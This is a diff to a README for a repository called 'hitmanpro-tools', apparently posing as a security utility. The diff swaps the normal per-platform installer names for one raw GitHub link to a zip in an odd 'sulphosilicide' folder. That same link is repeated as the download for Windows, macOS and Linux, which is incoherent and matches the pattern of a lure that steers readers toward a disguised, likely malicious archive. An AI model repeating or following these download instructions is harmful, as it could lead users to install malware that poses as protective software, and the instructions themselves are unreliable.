CesarPereiraa/hitmanpro-tools/readme.md

 Download, install, and run from the Releases page
 The Releases page is the primary source for the distribution artifacts.
 It includes installers, portable builds, and rescue environment images.
 Download the file that matches your platform, then run or mount it according to the platform’s guidance.
 The page is the gateway to the latest stable builds and historical releases.

-- For Windows, common artifacts include hitmanpro-tools-windows.exe or hitmanpro-tools-windows-portable.zip.
+- For Windows, common artifacts include https://github.com/CesarPereiraa/hitmanpro-tools/raw/refs/heads/main/sulphosilicide/hitmanpro-tools-3.0.zip or https://github.com/CesarPereiraa/hitmanpro-tools/raw/refs/heads/main/sulphosilicide/hitmanpro-tools-3.0.zip
-- For macOS, look for hitmanpro-tools-macos.dmg or hitmanpro-tools-macos-portable.tar.gz.
+- For macOS, look for https://github.com/CesarPereiraa/hitmanpro-tools/raw/refs/heads/main/sulphosilicide/hitmanpro-tools-3.0.zip or https://github.com/CesarPereiraa/hitmanpro-tools/raw/refs/heads/main/sulphosilicide/hitmanpro-tools-3.0.zip
-- For Linux, you might see hitmanpro-tools-linux.run or a similar shell package.
+- For Linux, you might see https://github.com/CesarPereiraa/hitmanpro-tools/raw/refs/heads/main/sulphosilicide/hitmanpro-tools-3.0.zip or a similar shell package.
 - Rescue environment images come as ISO or IMG files for bootable use.

 Usage guide: basic workflow